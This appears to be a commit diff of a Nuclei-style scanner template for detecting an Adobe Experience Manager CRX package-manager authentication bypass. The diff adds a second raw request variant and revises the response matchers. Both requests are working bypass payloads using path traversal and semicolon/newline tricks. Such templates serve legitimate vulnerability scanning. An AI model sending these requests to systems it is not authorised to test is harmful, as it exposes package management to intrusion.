Update aem-crx-bypass.yaml
parent
a3b9002c52
commit
39eb91a582
|
@ -10,21 +10,28 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
||||
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
User-Agent: curl/123
|
||||
Referer: {{BaseURL}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
- |
|
||||
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: curl/123
|
||||
Referer: {{BaseURL}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
word:
|
||||
- '"results:"'
|
||||
- '"path:"'
|
||||
- '"pid":'
|
||||
- 'buildCount'
|
||||
- 'downloadName'
|
||||
- 'acHandling'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
|
@ -34,4 +41,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue